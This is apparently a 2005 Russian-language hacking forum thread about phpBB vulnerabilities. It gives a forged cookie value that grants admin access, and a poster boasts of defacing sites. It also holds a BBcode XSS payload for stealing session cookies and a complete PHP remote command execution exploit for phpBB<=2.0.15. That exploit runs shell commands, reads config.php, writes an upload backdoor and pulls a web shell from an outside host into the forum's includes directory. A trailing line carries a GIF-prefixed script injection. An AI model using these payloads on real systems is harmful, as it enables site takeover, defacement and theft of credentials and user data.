offtop
{
BUG(O)R
Кыдыс/кидис это кто такие? =))
}
{
BUG(O)R
Кыдыс/кидис это кто такие? =))
}
Не такая уж и новая бага в phpbb с подменой куков.
Актуальна для версий с 2.0.6 по 2.0.12 включительно.
Заключается в подмене ваших куков на a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
Это дает нам админские возможности. По взлому снял видюху: http://vietnamwar.ru/winux/phpbb.rar
Убедительная просьбе не дефейсить то что я уже отдефейсил и не ломать того, кото я взломал в видюхе.
Читай тему сначала.А в 2.0.16 ещё никаких дырок не нашли?
Добавлено Jul 9 2005, 07:01 AM
А то у меня просто на сайте стоит вот и думаю обновлять или нет? wink.gif
Межсайтовый скриптинг в phpbb форуме
Программа: phpbb 2.0.16
Опасность: Низкая
Наличие эксплоита: Да
Описание: Уязвимость в phpbb форуме позволяет удаленному пользователю выполнить XSS нападение.
Удаленный пользователь может вставить специально обработанную комбинацию BB тегов в сообщение форума, чтобы выполнить произвольный код в браузере пользователя, посетившего злонамеренное сообщение. Уязвимость может использоваться для похищения конфиденциальной информации пользователя (идентификатор сессии или куки).
Пример/Эксплоит:
www.ut[url=www.s='' style='font-siz...t.cookie; this.sss=null`style='font-size:0;] [/url]'
На месте ЦВЕТ_ФОНА следует вписать код фона в сообщении, применяемом в данной шкуре форума. Для стандартного subsilver это #EFEFEF. Это сделано для того, чтобы невооруженным глазом внедрение нашего сплоита не было заметно на других браузерах, где код хотя и воспринимается некорректно, практической пользы не принесет, а вместо этого выкенет в браузер длинную некрасивую ссылку.
<?php
// phpBB<=2.0.15 remote command execution exploit v1.42 by Sad, icq 2257763
// 02.07.2005
// Last modified: 13.07.2005
session_start();
if (isset($_POST['url'], $_POST['topic'], $_POST['cmd']))
{
$_SESSION['url'] = $_POST['url'];
$_SESSION['topic'] = $_POST['topic'];
$_SESSION['cmd'] = $_POST['cmd'];
}
else
{
$_SESSION['url'] = 'http://';
$_SESSION['topic'] = 1;
$_SESSION['cmd'] = '_info_';
}
?>
<html>
<title>phpBB<=2.0.15 remote command execution exploit by Sad</title>
<body bgcolor='black' text='gray'>
<style>
textarea
{
background-color: black;
color: green;
}
input
{
background-color: black;
color: gray;
}
</style>
<pre>
<form action="<?=$_SERVER['REQUEST_URI']?>" method="POST">
url:<input name="url" type="text" value="<?=$_SESSION['url']?>" size=50> example: http://www.host.com/phpBB2/ <-- note ending slash
topic_num:<input name="topic" type="text" value="<?=$_SESSION['topic']?>" size=5> example: 1
cmd:<input name="cmd" type="text" value="<?=$_SESSION['cmd']?>" size=100> example: id;pwd;ls -lah;uname -a
<input type="submit" value="Exploit">
</form>
<?php
set_time_limit(120);
require_once 'sad_functions.php';
sad_exec_time();
if (empty($_POST['url']) || empty($_POST['topic']) || empty($_POST['cmd']))
die('Please fill out all fields.');
if ($_POST['cmd'] == '_info_')
{
$query = $_POST['url'].'viewtopic.php?t='.$_POST['topic']."&highlight='.phpinfo().'";
$answer = sad_get($query);
$startpos = strpos($answer, '<title>phpinfo()</title>')+strlen('<title>phpinfo()</title>');
$result = substr($answer, $startpos, strpos($answer, '<h2>PHP License</h2>')-$startpos);
if (strpos($result, 'PHP Version') === false) echo 'Exploit failed =(';
else echo "Exploited successfully. phpinfo() output:\r\n";
echo $result;
}
elseif ($_POST['cmd'] == '_up_')
{
$shell2upload = 'http://nightsite.nm.ru/';
$query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
"&highlight='.eval(\$_GET[cmd]).'&cmd=".
rawurlencode("fputs(fopen('./includes/sh.php', 'w'), file_get_contents('$shell2upload'));");
sad_get($query);
if (strpos(sad_get($_POST['url'].'includes/sh.php'), '200 OK') === false)
echo 'File upload failed =(';
else echo "File successfully uploaded =)\r\n<a href='".
$_POST['url']."includes/sh.php' target=_blank>Open shell</a>";
}
elseif ($_POST['cmd'] == '_echo_')
{
$query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
"&highlight='.eval(\$_GET[cmd]).'&cmd=".
rawurlencode('passthru(\'echo \\\'<?php\\\'>./upload.php;'.
'echo -e \\\'move_uploaded_file($_FILES[\047userfile\047][\047tmp_name\047], dirname($_SERVER[\047SCRIPT_FILENAME\047]).\047/\047.basename($_FILES[\047userfile\047][\047name\047]));\\\'>>./upload.php;'.
'echo \\\'?>\\\'>>./upload.php\');');
sad_get($query);
if (strpos(sad_get($_POST['url'].'upload.php'), '200 OK') === false)
echo 'failed =(';
else echo "File successfully created =)\r\n<a href='".
$_POST['url']."upload.php' target=_blank>Open</a>";
}
elseif (substr($_POST['cmd'], 0 , 4) == '_w_:')
{
$dir = substr($_POST['cmd'], 4);
$query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
"&highlight='.eval(\$_GET[cmd]).'&cmd=echo%20'_RESULT_START_';var_dump(is_writable('$dir'));echo%20'_RESULT_END_';";
$answer = sad_get($query);
$startpos = strpos($answer, '_RESULT_START_')+strlen('_RESULT_START_');
$result = substr($answer, $startpos, strpos($answer, '_RESULT_END_')-$startpos);
$result = convert_cyr_string($result, 'a', 'w');
echo 'Is "'.$dir.'" writeable?
'.htmlspecialchars($result);
}
elseif ($_POST['cmd'] == '_eval_')
{
$code = 'echo "any php code here\r\n";
$dir = ".";
$handle = opendir($dir);
echo "Reading directory ".realpath($dir)."\r\n\r\n";
while (false !== ($file = readdir($handle)))
{
echo $file;
if (is_dir($file)) echo " [DIR]";
if (is_writable($file)) echo " w =)";
echo "\r\n";
}
readfile("config.php");';
$query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
"&highlight='.eval(\$_GET[cmd]).'&cmd=echo%20'_RESULT_START_';".
rawurlencode($code)."echo%20'_RESULT_END_';";
$answer = sad_get($query);
if (strpos($answer, '_RESULT_START_') === false)
echo 'Exploit failed =(';
else
{
echo "Code successfully executed. Scenario output:\r\n\r\n<textarea rows=20 cols=90 readonly>";
$startpos = strpos($answer, '_RESULT_START_')+strlen('_RESULT_START_');
$result = substr($answer, $startpos, strpos($answer, '_RESULT_END_')-$startpos);
$result = convert_cyr_string($result, 'a', 'w');
echo htmlspecialchars($result)."</textarea>\r\n";
}
}
else
{
$query = $_POST['url'].'viewtopic.php?t='.$_POST['topic'].
"&highlight='.eval(\$_GET[cmd]).'&cmd=echo%20'_RESULT_START_';passthru('".
rawurlencode($_POST['cmd']).
"');echo%20'_RESULT_END_';";
$answer = sad_get($query);
if (strpos($answer, '_RESULT_START_') === false)
echo 'Exploit failed =(';
else
{
echo "Exploited successfully. Result:\r\n<textarea rows=20 cols=90 readonly>";
$startpos = strpos($answer, '_RESULT_START_')+strlen('_RESULT_START_');
$result = substr($answer, $startpos, strpos($answer, '_RESULT_END_')-$startpos);
$result = convert_cyr_string($result, 'a', 'w');
echo htmlspecialchars($result).'</textarea>';
}
}
echo '
'.sad_exec_time();
//&highlight='.eval($_GET[c]).'&c=include%20'http://localhost/php/upload.txt';
?>
</pre></body></html>
Хоре наглеть, тут никто не будет щупать ваши форумы. Мы не ломаем на заказ и не хотим иметь проблемы с чужими сайтами..Ваще офигели все платно сделали, кароч чонить сделайте с этим форумом
Не понял? А это тут при чем? Разница то какая?потому что там авторизация идет прям на сайте, а не на форуме
GIF8<script>alert('visit xss.pro/')</script>